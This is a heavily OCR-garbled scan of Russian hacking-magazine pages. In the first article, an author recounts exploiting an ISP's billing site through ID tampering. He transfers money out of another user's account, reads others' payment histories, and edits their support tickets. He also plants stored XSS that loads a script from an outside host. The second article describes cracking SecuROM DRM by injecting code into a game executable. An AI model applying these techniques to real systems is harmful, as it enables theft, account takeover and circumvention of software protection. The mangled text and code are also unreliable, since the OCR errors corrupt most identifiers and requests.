«бізаЫеб» (когда баланс равен нулю или отрицательный, то дан- 
ный переключатель неактивен). После этого нехитрого действия я 
применил изменения и попробовал перевести все средства стре- 
тьего счета на первый - основной: 



До 



*****дд . 


15р | 


Основной счет 


*****01 • 


-71р 1 


Интернет 


*****00 • 


- 100 р 


Телевидение 



ОТВЕТ НЕ ЗАСТАВИЛ СЕБЯ 
ЖДАТЬ, — ПОКАЗАЛАСЬ 
ФОРМА С ПРЕДЛОЖЕНИЕМ 
ПЕРЕВОДА СРЕДСТВ. БИНГО! 



После 

*****09 . _ 85 р | основной счет 

*****бі : _ 7 ір | Интернет 

*****60 : 0 р | Телевидение 

Как ни странно, данная операция прошла успешно. Еріс {аіі. 
Интернет, впрочем, у меня от этого не появился, поэтому я снова 
обратился к ЫтІ-исходнику страницы своего личного кабинета. 
Изучив его более подробно, я заметил следующие іприі-префиксы: 
«т_1топп» и «т_1о». Все указывало на то, что это были идентифи- 
каторы счетов в БД! Здесь возник резонный вопрос: отслеживает 
ли сервер подмену Ю? Недолго думая, я стал проверять свою до- 
гадку: изменил две последние цифры в поле «т_ітопп», применил 
изменения, выбрал нужные счета и нажал на кнопку «Оплата». 
Запрос с измененным Ю ушел на сервер. Ответ не заставил себя 
ждать, — показалась форма с предложением перевода средств. 
Бинго! Номер счета, откуда будут переведены средства, не со- 
впадал с моим номером, а в поле «Укажите сумму» была указана 
сумма, равная количеству средств на счете, с которого осущест- 
влялся перевод. Как ты помнишь, на моем счете в тот момент было 
-85 рублей, а форма предлагала мне перевести все 290! Указав 
немногим меньшую сумму (для незаметности), я нажал «Переве- 
сти», — и операция завершилась успехом. Значит, уязвимость есть, 
сервер не проверяет Ю на привязанность к аккаунту. Программи- 
сты, браво! Вернув деньги обратно, я решил углубиться в поиски 
других багов. Тут сразу стоит отметить, что все эти эксперименты 
могли серьезно испортить мне жизнь, — повезло, что провайдер 
решил не обращаться с заявлением о моих действиях в правоохра- 
нительные органы. В такой ситуации оправдаться у меня уже не 
получилось бы. 

УЧЕТ ОПЕРАЦИЙ 

Итак, предыдущая находка меня очень обрадовала. Теперь 
осталось узнать, насколько видны мои действия второмулицу. 

Ведь у каждого уважающего себя провайдера есть такая вещь как 
статистика/история платежей, предназначенная для того, чтобы 
следить за передвижением средств на счетах. Перейдя к истории 
платежей, я снова открыл исходный код страницы. Немного поли- 
став его, я сразу заметил тот же самый способ работы с Ю. Для его 
передачи серверу использовалась строка следующего вида: 

< іприі; 1:уре=Ьи1:1:оп ѵа1ие= ’ Показать 1 пате= 5 Ііоы_огсІег 5 _ 1 І 5 І: 
опС1іск = 1 5 ІіоыРау( 1 :ІіІ 5 .Тогт, ***39) ■ > 



«сі ’ХІприс іуре-' гів**-'лМГр«]' ХІаЬеІ 

5Гу1е^ , Ьвскаі"ои'ісІ-м1сгі№02РРСР| 

<*еі 5*у 1ч ■ 1 Ьэс %гздп(І ■ соіч г г «Е2Р РС Р ; ь >< Ь эОсмдеидй > 

5іуІе*'Ь*скаі"оипй-со1вг:»02РРСР; іур*р*'гагііо н ѵа1ие™'ІИ27':к1вЬ#1 

Ьм/ЭЫЬе1></Ы> 

БЁуІе ■ 1 Ьйс к|гоип^ - еоіс г : #02Р РС Р ; " > 



Первый баг с переводом средств 
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Здесь я снова изменил Ю и немедленно нажал «Показать», — 
опять успех: я увидел все операции со средствами на чужом Ю! 

Но там был и мой след. Значит, все мои действия с деньгами были 
заметны второмулицу. Однако все равно здесь не было видно, куда 
и почему они были переведены, — таблица представляла из себя 
три столбца: «Дата», «Сумма (руб.)» и «Номер учетного документа». 

БОЛЬШЕ, БОЛЬШЕ КРОВИ! 

Ладно, с этим все ясно, но что можно сделать еще? На глаза по- 
палась кнопка «Запрет доступа», отключающая все предоставляе- 
мые провайдером услуги. Работала она также с Ю и 35. Конечно, 
увидеть работоспособность этой вещи я не мог. Или же можно было 
написать скрипт, который прошелся бы по списку Ю и отключил 
всем пользователям интернет/телевидение/телефон -даешь 
хлеба и зрелищ :). Однако одним запретом доступа я ограничи- 
ваться не захотел и попытался разобраться во всем этом на более 
глубоком уровне. 

Итак, вернувшись к операциям над средствами, я запустил 
прогу СЬагІез (сЬагІезргоху.сот — замечательный снифер, 
дебаггер и прокси-сервер в одной упаковке). Но данные шиф- 
ровались, и ничего толкового я не увидел. Тогда я запустил ІЕ 
с плагином іеНТТРН еасіегз, перешел в личный кабинет и произвел 
уже знакомую тебе транзакцию средств с одного счета на другой. 
іеНТТРНеасІегз показал следующий запрос: 

Р05Т /сііепі: . рбр 

х]'х-Рип=сІіап§еСІіаск&х]хаг§5[ ]=***18&хз'хаг§5[ ]=***39& 
х]'хаг§5[]=120.0 

Здесь ключи массива такие: 1 — с какого счета, 2 - на какой 
счет, 3 - сколько денег переводить. Далее я решил попробовать 
сформировать аналогичный предыдущему 6 ЕТ-запрос и перешел 
по сформированной ссылке. Все снова работало, средства перево- 
дились. Я думаю, теперь ты понимаешь, что можно было натворить 
при помощи базовых знаний 35 и больной фантазии? К слову, тут 
мне вспомнился фильм }{0ТТЙБЬ)Ч: «- А сколько качать-то? — Че 
ты тупые вопросы задаешь? Миллион качай!». 

ЧТО-ТО ЕЩЕ? 

Далее я подумал, что можно копнуть еще глубже. В самом начале 
каждого из ЫтІ-исходников была такая строка: ІзЛипс.із. Хорошо, 
формирую ссылку, перехожу по ней и вижу реализацию функций 
операций на сайте. Самой нужной мне вещью оказалась функция 
заѵеЫеѵѵРаззО — она работала по той же схеме Ю+35. Как ясно из 
названия, предназначена эта функция для смены пароля пользо- 
вателя. Все, что нам надо, — код, который бы осуществлял про- 
стейший перебор по словарю и менял его при условии нахождения 
верной комбинации. Какова вероятность того, что все пользова- 
тели изменили стандартные пароли (обычно состоящие всего из 
нескольких цифр)? Кстати, тут не было даже банальной капчи или 
блокировки по ІР при множественных ошибочных авторизациях 
и других запросах! Да и авторизация тоже хромала — основана 



Дн іЧшѵчнп Слэтт 1 нтсНвдслр; гтсрлцм*т> ■ от™ і і рчц.ШЛ. і' Ц і ЮТГѴІ 

гіЛн м Еѵ -'КіЛ Г ні№ вйигС А 109 (птОЛЁЙ пЛ СНЫ» т^п-рй 

для геп ■ т »т № лат зтп* "МйАййив гчіи мл клан. 




ПЛК 7 Ч нр #р« СЧИ ІкЩК В ЭВД |^Ч*. іглсфыі 

№ір 4 іСПйЛкКЖІГ ь тМ ДЙСІ р'і-шм 1 АпЫЫ цСЛѵГЛ 

чсіс йол*ие иода? В ш п^нчсик. бо-члк гс--гмпс 




Тикеты службы поддержки 

і она на методе Вазіс АиіЬепІісаІіоп. Мне хватило всего пары минут, 
чтобы накидать программу для брутфорса. Благо, все дороги были 
открыты, а доступ в личный кабинет осуществлялся по локальной 
і сети, то есть интернет не был нужен, и все могло произойти очень 
і и очень быстро... 

Впоследствии я рассказал об обнаруженной уязвимости ІТ- 
отделу провайдера, так что она была довольно быстро исправлена. 
Ошибку объяснили тем, что «все работало через хитрую схему, 
поэтому так глупо и вышло» :). 

НОВЫЕ БАГИ 

і Проходит день, неделя, месяц, и у меня появляется желание про- 
верить что-нибудь еще в личном кабинете. Я открыл страницу 
просмотра статистики, изменил Ю, отправил запрос. В итоге на 
моем экране вновь отобразилась чужая статистика. Оказалось, 

! что после прошлого исправления корректно стало работать только 

і тот раздел личного кабинета, где осуществлялся перевод средств, 

і а все остальное так и осталось по-прежнему. Я не захотел ковы- 
ряться дальше со старыми багами, поэтому попробовал найти еще 
места, где использовался столь оригинальный метод работы с кон- 
фиденциальными данными пользователей. Тут стоит заметить, что 
меня уже давно интересовал раздел «Электронные заявления», 
і Зайдя туда, я создал бессмысленный вопрос: «Почему е-таіі не 
і привязывается к учетной записи?». Страница с вопросом содержа- 
і ла довольно интересную информацию: ФИО + ІР. Также присутство- 
вала возможность правки сообщения, а вот кнопка удаления не 
работала. В исходном коде нашлась такая строка: 

<а бге-р="3аѵа5сгір1; : есШ:_ро51:(***01^ ***і)" 
і с1а55=2І1х-Роп1: с1а55=2І1>Редактировать</Топ1:></а> 

Я поправил значения, вычтя из каждого по 3, применил измене- 
ния, нажал «Редактировать» и увидел страницу с тикетом другого 
пользователя! Изменив его, я попробовал сохранить вопрос, — 
операция завершилась успехом. После, еще раз изменив значение, 
і я попал уже на ответ техподдержки. Поправил, сохранил, — все 
і получилось. Значит, я могу править сообщения любого юзера! 
і Осталось лишь найти остальные функции для работы с заявками. 
Снова немного покопавшись в исходном коде страницы, я отыскал 
строку следующего вида: 



ВСЕ, ЧТО НАМ НАДО, — КОД, 
КОТОРЫЙ БЫ ОСУЩЕСТВЛЯЛ 
ПРОСТЕЙШИЙ ПЕРЕБОР ПО 
СЛОВАРЮ И МЕНЯЛ ЕГО ПРИ 
УСЛОВИИ НАХОЖДЕНИЯ 
ВЕРНОЙ КОМБИНАЦИИ. 



<5сгір1; 1ап§иа§е= 1 ИаѵаБсгірІ: ’ згс= ’ 35 /М . ]5 1 х/зсгірі^ 
Собственно, в файле )з/ЬсІ.І 5 и лежали функции для работы 
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с заявлениями. Я решил использовать функцию 5ІіоѵѵТікеі(п). 
Поправив код и указав произвольный номер заявления, я при- 
менил изменения и нажал на кнопку «Редактировать». Открылась 
страница, на которой был запрос пользователя, а также ответы от 
техподдержки. Вроде бы ничего такого, но я увидел их ФИО и ІР! 
Кстати, злоумышленник в такой ситуации мог бы подождать ответа 
техподдержки любому пользователю, а после отредактировать 
сообщение, например, так: «Скачайте (...) для устранения про- 
блемы, но антивирус может ругаться на данное приложение, так 
что отключите его на время». Вуаля! Троян залит, да еще и от лица 
провайдера. 

А КАКЖЕХ55? 

Хорошо, я нашел способы редактирования, удаления, просмо- 
тра и отправки тикетов. Идем дальше. Вернувшись в личный 
кабинет, я решил поискать Х55. Потратив достаточно времени 
на поиски, я не нашел уязвимых мест (так мне тогда казалось). 
Однако дальше, взглянув на раздел под названием «Контактная 
информация», я увидел, что у каждого из трех полей («е-таіі», 
«Телефоны» и «Телефон для 5М5-уведомлений») есть кнопка 
для редактирования. Телефоны, это понятно, должны иметь 
очевидную фильтрацию цифра/не цифра, но вот поле «е-таіі» 
вполне может содержать в себе баг. Я попробовал протолкнуть 
простой код: 

<зсгір1: з гс= " И1:1:р ://***/оо5" Ііуре^'Ііехі/заѵаБсгірІ:" > 
</зсгір1:> 

Естественно, все это дело спровоцировало ошибку «Введен 
некорректный е-таіі». Хорошо, возвращаюсь к ІЕ и смотрю, что мне 
говорит «іеНТТРН еасІегБ»: 

Р05Т /сІіепТ . рбр НТТР/1.1 




Отображаем произвольные страницы через активную Х55 




История перевода средств 

: х]х-Рип=5аѵеЕтаі1&х]хг=1328363403426&х]хаг§5[ ]=ТЕ5Т 

х]х-Рип=5аѵеТе1&х]хг=13283633б1153&х]хаг§5[ ] =000000000000 
х]х-Рип=5аѵе5М5Те1&х]хг=1328363389834& 
і хз'хаг§5[ ] =000000000000 

Открываю переменную х ) х г, составляю ОЕТ-запрос, выполняю 
его и проверяю — все работает, значения сохраняются. Теперь не- 
много изменим запрос сохранения е-таіГа: 

і /сііепі:. рбр?х]хТип=5аѵеЕтаі1&х]хаг§5[ ] = 

і <5сгір1: б гс= " И1:1:р ://***/ ооб" Ііуре^ЧехІі/заѵазсгірІ:" > 

і </зсгір1:> 

В о.) 5 находится обычный аІегі["Х55");. Выполняю — успех! 
Мой ядовитый текстуспешно был сохранен. Далее я решил 
обновить главную страницу личного кабинета и сразу же увидел 
і выскочивший аІегЕ Что может быть лучше активной Х55 на глав- 
і ной странице личного кабинета любимого провайдера? Однако 

этого мне было мало, необходимо добить еще два поля. Вот что 
я сделал: 

• /сііепі: . рІір?х]х-Рип=5аѵеТе1&х]хап§5 [ ] =000000000000 
<зсгір1: б гс= " И1:1:р ://***/ ооб" Ііуре^ЧехІі/заѵаБсгірІ:" > 
і </зсгір1:> 

і • /с1іеп1:.рІір?хзхТип=5аѵе5М5Те1&х]хаг§5[ ] =000000000000 

І <5сгір1; б гс= " И1:1:р ://***/ ооб" Ііуре^ЧехІі/заѵаБсгірІ:" > 

</зсгір1:> 

Снова все успешно! Видимо, разработчики не рассчитывали на 
і то, что кто-то допишет их код. Здесь следует учесть, что макси- 

і мальная длина кода, который возвращался на странице, составля- 

і ла 260 символов, так что три уязвимых поля были весьма кстати. 

ПОДВОДЯ итоги 

Уже позже от сотрудников ІТ-отдела я узнал, что некоторые фай- 
лы сайта не редактировались с 2008 года. Убогий код с огромным 
і количеством уязвимостей остался как наследие от работавших 

і ранее программистов. 

і Как такой биллинг работал в течение долгого времени, я пред- 

і ставляю с трудом. Но теперь еще больше уверен, что детские 

уязвимости в виде полного отсутствия пользовательского кода 
встречаются повсеместно, даже если речь идет о серьезных 
компаниях, которые имеют дело с личными данными пользова- 
і телей и их денежными средствами. К счастью, текущая команда 

і программистов быстро исправила все ошибки на сайте. И-Е 
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ВНЕДРЕНИЕ Х-КОДА 
И ВИРТУАЛЬНАЯ 
МАШИНА: ТЕОРИЯ 
И ПРАКТИКА 



Если ассоциировать БесиРОМ 
ѵ7.33.17 с танком Абрамсом без 
динамической защиты, ОІІуйЬд 

— с гранатометом РПГ-7, а X- 
собе іпіесііоп — с кумулятивной 
гранатой для гранатомета, 

то, как и в реальности, 
такой выстрел навзничь 
прошьет броню этой тяжелой 
неповоротливой машины 
и достигнет поставленной цели 

— ОЕР. Выведенную из строя 
машину изучают Российские 
инженеры... 



ВВЕДЕНИЕ 

Стратегия ТіЬегіит ѴѴагз до сих пор явля- 
ется одной из самых популярных игр серии 
СоттапсІ & Сопдиег от небезызвестной 
конторы Еіесігопіс Агіз. Последняя лояльно 
относится к Зопу Оідііаі Аисііо йізс Согрогаііоп 
(50ІМѴ ОАОС), чью мать вспоминают, когда 
очередная игрушка, запротекченная ЗесиРОМ, 
просит вставить оригинальный диск. Несмотря 



Ищи на диске: 

• Полную 
версию данного 
исследования; 

• 5есиР0М_7 РгоИІег 
ѵІ.О; 

• Материалы по 
работе ЗесиРОМ 7 
&ѴМ; 

• Исходники Х-сосіе 
іпіесііоп (Іхі-Ьіп); 

• Видео «Х-сосіе 
іпіесііоп 
в действии!» 

на сумасшедшую «популярность» ЗесиРОМ во 
всем мире, в нашей стране редко когда можно 
услышать о нем публично [ ехеІаЬ.ги в расчет не 
берем). В первую очередь это объясняется на- 
личием своего звездного протектора, но если 
Зопу после нескольких судебных разбира- 
тельств отказалась от услуг нулевого кольца, 
то ребята из Ргоіесііоп ТесЬпоІоду продолжают 
пользоваться низкоуровневыми функциями, 
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Нам дали зеленый свет! Снимаем дамп! 

где абсолютным чемпионом по вызову являет- 
ся КеВидСЬескЕх. 

Таким образом у разработчиков осталась 
одна арена для битвы — прикладной уровень. 
И, естественно, они приложили максимум 
усилий для обеспечения надежной защиты... 
которая была пробита, разобрана и демонти- 
рована :). 

ѴѴНАТ 13 ТАРѲЕТ 

Сначала определимся с нашим инструмента- 
рием. Собственно, понадобится сама игруш- 
ка ТіЬегіит ѴѴагз (с последним патчем 1.9), 
для снятия дампа — ОІІуйЬд 1.10 с ОІІуйтр 
(собственно как дампер) и ОІІуйЬд 2.0 без 
каких-либо плагинов. Несмотря на такой столь 
скромный набор, в нашем случае работать 
можно с одним отладчиком, а основным 
оружием будет ассемблерный код. Но прежде 
всего ответим на вопрос, какой исполняе- 
мый файл требуется загрузить в отладчик. 
Переходим в папку с установленной игрой. 
Первым на глаза попадается безобидный 
СІМСЗ.ехе: судя по точке входа, откомпили- 
рован МісгозоЙ С++ 7.0, стандартные секции 
Тех*, .гсіаіа... Правда, если его запустить, нас 
вежливо попросят вставить оригинальный 
диск. Извините, имеется только йаетоп 
Тооіз с образом, поэтому возникает вполне 
нормальное желание развязать четвертую 
тибериумную драку и, в конце концов, ото- 
драть проверку диска от программы. Так как я 
был знаком с предыдущими играми из серии 
СпС, то знал, что СІМСЗ.ехе играет роль обертки 
и просто через ѴѴіпАРІ СгеаІеРгосезз запускает 
нужный файл с расширением .сіаі (на самом 
деле обычный МісгозоЙ РЕ ЕХЕ Іюгтаі) с нуж- 
ными параметрами. Несложно догадаться, 
что искомая цель — \РеІаіІЕхе\1.9\спсЗдате. 
баЕ Грузим в отладчик упомянутый файл и по 
секции .зесигот понимаем, с чем имеем дело. 
Р9... Милое окошко с надписью «Не удалось 
запустить требуемый модуль безопасности». 
Еще раз его можно прочитать, если запустить 
любой АРІ-шпион, РгосМоп... Одним словом, 
разработчики прекрасно осведомлены о всех 



программах, которые создают неприятности их 
продуктам. Присоединиться к процессутоже 
нельзя — он просто завершится. Впрочем, эта 
гадость действует только на время проверки 
диска. Неплохо! Для меня тогда это означало, 
что ближайший месяц ОЕР и рабочий дамп я 
точно не увижу. Конечно, спустя несколько ме- 
сяцев я не хуже разработчиков знал, что и как 
работает в БесиРОМ 7.33. Причем вся линейка 
7.3х практически идентична, особенно это ка- 
сается виртуальной машины (самое заметное 
изменение: <зрасе Іюг гепІ> в более поздних 
версиях заменено на «Ѵои Аге ІМоѵѵ Епіегіпд а 
Резігісіесі Агеа»). Но сейчас у меня только один 
отладчик и никакой надежды выйти победи- 
телем такого серьезного врага, над созданием 
которого трудились весьма не глупые люди. 

ФИЛОСОФИЯ ВЗЛОМА 

Пробить навесную броню и доехать до ОЕР 
тупым ковырянием в отладчике — слишком 
долго и неэффективно. Будем бить в борт! 
Первая дыра в защите не заставила себя 
долго искать: я сразу заметил, что протектор 
не проверяет целостность всего файла. Ну, не 
то чтобы совсем не проверяет, нечто подобное 
имеется, но воттолько идет оно как провер- 
ка участков и направлена, прежде всего, на 
выявление программных точек останова (так 
называемый «перекрывающий код»). Она мне 
никак не мешала, поэтому в практическом 
плане это означает, что возможно внедрение 
Х-кода в образ файла статическим путем. 
Строго говоря, Х-код — это осмысленная со- 
вокупность байт, внедренных посторонним 
лицом или программой в целевой код процесса 
с целью выполнения определенной задачи. 
Различают следующие типы: 

1. Оп-Ііпе раІсЫпд. Через ѴѴіпАРІ 
ВеасІРгосеззМетогу/ѴѴгіІеРгосеззМетогу 
читаем/пишем в адресное пространство 
процесса. К примеру, таким образом, ставят 
флаг регистрации в ЖЕхрІогег под эгидой 
АзРаск 2.11с, чтобы не заморачиваться 

с распаковкой. Однако современные про- 
текторы типа ТЬетісІа не дают доступ в свое 
адресное пространство. 

2. ОНІіпе раІсЫпд. Или статический патчинг. 
Собственно, наш случай, когда ничто не 
мешает писать прямо в исполняемый об- 
раз и перехватывать в нем управление. 
Обнаружить такого «Штирлица» у себя 

в тылу протекторам на порядок сложнее. 
При необходимости одурачивают защиту, 
делая оригинальную копию исполняемого 
файла и через ОеіСоттапсіипе/ОеіРіІеРаіЬ 
возвращают ссылку на него. 

3. ОІІ-Ыіаскіпд. С учетом того, что при загруз- 
ке образа первыми получают управление 
динамические библиотеки, записанные 

в его таблице импорта (точнее, функция 
ОІІМаіп), то мы первыми получаем бразды 
правления над защитой и успеваем скрыть 
себя задолго до работы навесной брони. 

Напоминаю, что для быстрой загрузки можно 
прописаться в НКІ_М\5оІТѵѵаге\Місго50ІТ\ 



ѴѴтбоѵѵзМТ\СиггепіѴег5Іоп\ѴѴіпсІоѵѵ5\АррІпіЕ 

Так вот, наша задача — перехватить управ- 
ление в нужном месте и показать адрес воз- 
врата, чтобы в нужное время присоединиться 
к процессу. Почему я иду таким путем? Как уже 
было упомянуто выше, вся проблема состоит 
в том, что разработчики прекрасно осведом- 
лены о любых программах, которые создают 
проблемы их продуктам. Этот факт несложно 
проверить, прослушав СгеаІеРіІе, РіпсІѴѴіпсІоѵѵ 
в исследуемом протекторе. Механизмы меж- 
процессного взаимодействия — вчерашний 
день; передовой способ борьбы с наворочен- 
ными защищалками — непосредственное 
внедрение в целевой образ защищенной про- 
граммы. Обнаружить его на порядок сложнее, 
ведь в этом случае мы используем ресурсы 
самого протектора. Дабы противостоять такому 
раскладу, прежде всего вводят проверку 
целостности файла (динамическая защита). Ту 
самую, которая отсутствует в нашем случае (чем 
я, собственно, воспользовался). Едем дальше. 

Я уже сказал, что для компиляции СІМСЗ.ехе 
использован МісгозоЙ С++ 7.0. А ведь очевидно, 
что и спсЗдате.сІаІ откомпилирован тем же ком- 
пилятором. Точка входа выглядит как: 

004628ОА САН 004784В8 
004628РР ЗМР 004626РА 

Реально точка входа находится по 
операнду прыжка — 004626РА6. Функция 
по адресу 004784В8И ничем полезным не 
занимается, и я ее всегда игнорирую. Однако 
в ней мы находим, что она вызывает не- 
сколько АРІ (беіБузІетТітеАзРіІеТіте, 
беіСиггепіРгосеззІсІ...). Для нас это означает 
только одно: если в (ЗеіБузІетТітеАзРіІеТіте 
внедрить Х-код, который перехватит управ- 
ление и покажет нам адрес возврата, то у нас 
будет замечательная возможность попасть 
в окрестности ОЕР и снять рабочий дамп, при 
условии, что после распаковки стартовый 
код действительно на своем законном месте. 

И хотя БесиРОМ 7.33 проверяет прологи 
некоторых значимых ѴѴіпАРІ, этот список 
весьма неполон, плюс сама проверка идет 
только в самом начале. Воттебе и следующий 
недочет! Теперь пора собрать нашу куму- 
лятивную гранату. Место для базирования 
я выбрал в конце секции .езі и приступил 
к сборке — написанию азт-кода, который 
самостоятельно выполнит всю работу. Весь 



Понимание главного хранилища является ключевым для 
взлома алгоритмов работы виртуальной машины 




ХАКЕР 04/159/2012 



069 







взлом 



код состоит из двух частей. Первая доста- 
вит саму гранату на место: заменит пролог 
СеіЗузІетТітеАзРіІеТіте на безусловный 
переход ко второй части. Собственно, в этом 
случае получаем управление из распаковщи- 
ка (определить место которого несложно, по- 
ставив точку останова на секцию .Іехі) и туда 
же его возвратим после того, как переход бу- 
дет установлен. Кстати, первоначально, чтобы 
получить доступ на запись в секцию кегпеІ32. 
Іехі (дело было на висте), я офлайн на 2кЗ 
через РеТооІз устанавливал атрибут ѴѴгіІе, 
пересчитывал контрольную сумму... и ведь 
работало! Способ весьма дурной, учитывая, 
что есть ѴѴіпАРІ Ѵігіиаі Ргоіесі, но нестандарт- 
ные подходы иногда тоже на руку. Переходим 
ко второй части нашего представления. 
Первоочередной задачей здесь является по- 
каз адреса возврата и удержание управления 
до прибытия на место отладчика. Я реализо- 
вал свой алгоритм, который переводит Іа где 
іпіедег в АС5ІІ2-строку (об Коа я тогда не 
знал), а задачу показа и удержания управле- 
ния элегантно решил с помощью МеззадеВох, 
но затем управление передается обратно 
в ѴѴіпАРІ. Впрочем, для показа можно нагло 
использовать функционал самого протектора 
— СгеаІеТЬгеасІ с адресатом ООР9АООЕ, но это 
непроизводительно. Итак, граната собрана, 
попробуем! Монтируем мини-дамп. Запускаем 
игру. Нас интересуют все МеззадеВох после 
проверки: ООООСЕ77, 76В41404, 7С34207В, 
0040А5АЕ... Сто-ооп! Последний, да ведь 
вызов идет из секции .ІехН ѴѴе пееб аМасЬ 
поѵѵ! Присоединяемся к процессу ольгой 1.10, 
которая с дампером, и переходим по послед- 
нему адресу. Невероятно, но мы остановились 
практически в ОЕР (точка входа расположена 
по адресу 0040А2С7). Немногим позже, когда 
виртуальная машина (ѴМ) стала более-менее 
изучена, было сделано еще одно умошоки- 
рующее открытие (снова просчет команды 
из ЗОІМѴ ОАОС) — попасть в ОЕР можно 
с ювелирной точностью и при этом еще более 
безопасным путем. И как вы думаете, что 
этому помогло? ЗесиРОМ ѵ7.33 ѴИиаІ МасЫпе, 
чья задача — наоборот защищать от взлом- 
щиков, но никакуж не помогать им! 

5ЕСІІР0М Ѵ7 ѴІРТІІАІ_ МАСНІМЕ 

Инженеры Зопу ОАОС как в воду глядели: 
с готовым образом добраться до ОЕР и снять 
дамп — по факту дело нескольких минут, 
матерых взломщиков это никак не остановит. 
Навесная защита бессильна, значит, выход 
один — сделать максимально неработоспособ- 
ным дамп! Следуя этой логике, большинство 
не хочет заморачиваться с ѴМ, прописывая 
ее сложную структуру, в которой нереально 
разобраться за приемлемое время, и предпо- 
читая дампить всю выделенную виртуальную 
память, и имеющую, и не имеющую отношение 
к ѴМ, и приваривают ее в виде отдельной сек- 
ции, предварительно догадавшись вставить 
после конструкции «МОѴ ЕАХ, 1; СРІІЮ;» 
инструкцию «МОѴ АІ_, СІІККЕІ\ІТ_СРІІІО_КЕѴ_ 
ОЕІ_ТА_ОЕСОРЕ» и проделать оное еще 254 раза. 
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ПТТТ1 

« ЬіЫѵ/х4іВ2Р — 

англоязычная статья 
по виртуальной 
машине БесиКОМ 
7.30. Я нашел эту 
публикацию когад 
уже завершал 
исследование, но 
тем приятнее было 
увидеть, что в целом 
наши выводы 
совпали. Однако 
в статье структура 
ѴМ излагается 
в несколько ином 
виде, да и некоторых 
аспектов работы ѴМ 
я не увидел. 

« ЬіІ.Іѵ/х69І.гѵ — 

НоОѴЦ для СпСЗ: 
ТіЬегіит ѴѴагзѵІ.9. 
Отличительной 
особенностью 
является 
пристроенная 
в секцию .тепл- 
оту виртуальная 
машина. В статье 
взят в качестве 
основного 
примера. Новичкам 
рекомендуется 
начатье него. 



Оптимизируя скорость работы виртуальной машины, в 50ЫѴ ОАОС решили оставить без 
обфускации один из островков! 



В итоге не выигрываем ни в размерах дампа, 
ни в быстродействии. 

В общей сложности на полный разбор ѴМ 
ушло около двух месяцев, причем первые 
полтора я попросту копался во всем без 
разбору, пока не «догадался» начать ис- 
следование с самого начала цепочки — и вот 
тут началось... Сама ЗесиРОМ ѵ7.3х ѴМ по 
существу не является виртуальной маши- 
ной в привычном представлении, никакой 
асм-код там не эмулируется. Все куда проще: 
по существу процедура с двумя аргументами 
(І.РОѴѴОРО и ѴОЮ) и тремя вариантами работы. 
Ну а дальше остается только удивляться. 
Во-первых, чтобы понять, как оно работает, 
просто внимательно изучи первый островок 
(кусок кода от зріп-блокировки до ЗМР ЕАХ), 
который, как ни странно, выполняется всегда, 
и всегда первый. 

КЕР 5Т05 ОІлІОКО РТК Е5:[ЕОІ] 



МОУ РЫОКР РТК Р5: [ЕВХ+4] .ЕАХ 
МОУ ЕАХ, РІлІОКР РТК 55:[Е5Р] 
МОѴ ОІлІОКО РТК 05: [ЕВХ+8] , ЕАХ 



МОѴ ОІлІОКО РТК О5:[ЕВХ+0С],ЕОХ 
МОѴ ВУТЕ РТК Р5: [ЕВХ+1Ѳ] .95 
МОѴ РІлІОКР РТК Р5: [ЕВХ+14] , ЕВХ 
МОѴ РІлІОКР РТК 05: [ЕВХ+1С],Е5Р 

Код, приведенный выше, с потрохами выдает 
главное хранилище, которое играет ключевую 
роль в ѴМ. Разберешься в переменных и в обла- 
сти хранения промежуточных данных — считай, 
что ѴМ на 90% взломана! Во-вторых, стало оче- 
видно, что по существу здесь все наштамповано 
методом сору/разіе. В-третьих, сумасшедшее 
количество закономерностей вплоть до исполь- 
зования регистров СРІІ на островках. А тот факт, 
что один из островков находится без обфускации 
— вообще убило! Единственное, что здесь ре- 
ально доставляет, это Р01_-байт (сгурІ-ЬуІе), так 
как без знания того, какие точно матоперации 
с ним выполняют все 255 островков виртуальной 
машины, невозможно построить кулхацкерскую 
автоматизированную ломалку и снять все за 
раз. Собственно, кому хочется понимать, о чем 
все-таки идет речь — читайте полный вариант 
статьи на диске или на нашем сайте. Следующий 
вопрос — реально ли отодрать ѴМ оттибериума? 
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Тибериумный реверсинг 





0044Р4О2 йЕС ОІлІОКО РТК 05:[158297А] 
0044Р4Р8 ЗЕ ІМОРѴР . Ѳ0482РЕ5 
00482РЕ5 МОѴ РІлЮКР РТК Р5 : [158297А] , 18Р 
00482РЕР ЗМР ІМОРѴР . 0044Р4РЕ 



Последним пунктом отсылаем дамп в 5опу 
РАРС. На этом тибериумная драка заканчива- 
ется. 



ОЕР на горизонте! ѴМ под контролем хР 



В заключение я просто поблагодарю 50ІМѴ 
РАРС за ее действительно интересный про- 
дукт (для хакеров в частности)! До встречи на 
страницах ][. ік: 



Интуиция подсказывает, что более чем! Я уже 
успел проболтаться, что вариантов работы три. 
Начнем с последнего (способ №2), собственно 
нумерующихся по мере их появления в за- 
щищенной программе. Способ №2 полностью 
завязан с двумя противоположными по логике 
работы алгоритмами, представленными в виде 
двух процедур с двумя аргументами, которые 
отрабатывают друг за другом. В первом заносим 
любое число (например, 1), второй — ссылка на 
массив ключей ЫіъеІ 00В93АРС), которые копи- 
руются в стек ѴМ. На выходе в ЕАХ получается 
что-то типа закодированного числа (0790А442), 
которое было передано в первом аргументе. 

Если это закодированное число (0790А442) скор- 
мить в первый аргумент алгоритма обратного 
хода, то на выходе в ЕАХ мы получаем туже 1, 
при условии, что массив ключей был одинаков 
(оІЧзеІ 00В93АЕС). Короче, имеем две функции, 
дающие в сумме нулевой эффект. Собственно, 
рольѴМ в них такова: в первом случае крышуют- 
ся асм-инструкции 

МОѴ ЕСХ,_РІлІОКР РТК 55 : [ЕВР+8] 

МОѴ ЕСХ,_РІлІОКР РТК 05 : [ЕСХ] 

МОѴ ЕАХ,_РІлІОКР РТК 55: [Е ВР+0С] 

АИР ЕАХ, ЕСХ 
МОѴ ЕСХ, ЕАХ 

Во втором — инструкция І\ІОР в переносном 
смысле. Причем прийти к этому выводу можно 
и без вскрытия ѴМ, просто сравнив две упомя- 
нутые процедуры (обратного и прямого хода). 

Следующие в списке способы — №1А и №1. 
Они похожи, но с той лишь разницей, что 
первый после выхода из ѴМ переносит нас 
в запрашиваемую ѴѴіпАРІ, а второй — в за- 
прашиваемую внутреннюю функцию (к слову, 
это может быть одна асм-инструкция, чаще 
всего — операция с резервированием стека). 
Скрытых ѴѴіпАРІ не так уж и много, вот не- 
полный список: ЗеШпЬапсІІесІЕхсерІіопРіІІег, 



БесиКОМ ѵ7.33.017 и не представляет, какими серьезными последствиями грозит внедренный Х-код 



6еіМосІиІеРіІеІ\ІатеА, ОеІеІеРіІеА, ОІоЬаІЕгее. 
Обращение к ѴМ в этом случае всегда ознаме- 
